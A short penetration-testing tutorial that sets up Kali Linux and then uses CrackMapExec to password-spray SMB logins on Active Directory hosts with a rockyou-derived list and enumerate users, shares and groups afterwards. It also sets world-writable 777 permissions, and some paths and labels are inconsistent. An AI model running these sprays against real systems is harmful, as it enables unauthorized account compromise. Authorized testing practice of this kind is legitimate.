Prepping Kali Linux before a penetration test is crucial because it ensures the system is fully updated, properly configured, and equipped with the right tools for the engagement. Outdated software, missing dependencies, or misconfigured settings can cause tools to fail at critical moments, slowing down the assessment and reducing its effectiveness. By updating repositories, verifying tool functionality, and customizing the environment to the scope of the test, you minimize disruptions and increase efficiency. A well-prepared Kali Linux environment also helps maintain professionalism, as it demonstrates thoroughness and readiness when conducting security assessments for clients.
Create folders to store utilities and files
sudo apt install crackmapexec -y
<!-- Make a new directory on root for Active Directory Tools -->
sudo mkdir ad
cd ad
sudo mkdir hacks
sudo mkdir crackmapexec
cd crackmapexec
<!-- Grant permission to newly created folders and files -->
sudo chmod -R 777 ad
<!-- First install Sublime Text Editor -->
<!-- Paste in the all usernames from Active Directory -->
subl users.txt
<!-- Prepare Wordlist -->
cd /usr/share/wordlists
<!-- (Optional) View permissions for wordlists -->
ls -la
<!-- Change back to crackmapexec directory -->
cd /ad/crackmapexec
<!-- Check that your wordlists is working -->
head -n 1000 /usr/share/wordlists/rockyou.txt
<!-- Output to a new file in the crackmapexec directory -->
head -n 1000 /usr/share/wordlists/rockyou.txt > passwords.txt
<!-- Run crackmapexec for first time to get setup-->
crackmapexec
<!-- (Optional) NMAP Domain Controller to view open ports -->
nmap -Pn <target ip>
<!-- (Optional) NMAP target Workstation to view open ports -->
nmap -Pn <target ip>
<!-- Use crackmapexec to get info about machine -->
crackmapexec smb <target ip>
<!-- Create a target file with IP of target machine -->
subl /ad/crackmapexec/targets.txt
<!-- Attempt a single username/password hack on target -->
crackmapexec smb targets.txt -u username -p password
<!-- Use the users.txt and passwords.txt files on target -->
crackmapexec smb targets.txt -u users.txt -p passwords.txt
<!-- (Optional) Continue after found password -->
crackmapexec smb targets.txt -u username -p password --continue-on-success
<!-- (Optional) Continue after found password, then display on-screen -->
crackmapexec smb targets.txt -u username -p password --continue-on-success | grep '[+]'
<!-- After successful password hack, display groups -->
crackmapexec smb targets.txt -u username -p password --password-pol
<!-- After successful password hack, display local groups -->
crackmapexec smb targets.txt -u username -p password --local-group
<!-- After successful password hack, display other users -->
crackmapexec smb targets.txt -u username -p password --users
<!-- After successful password hack, display shares -->
crackmapexec smb targets.txt -u username -p password --shares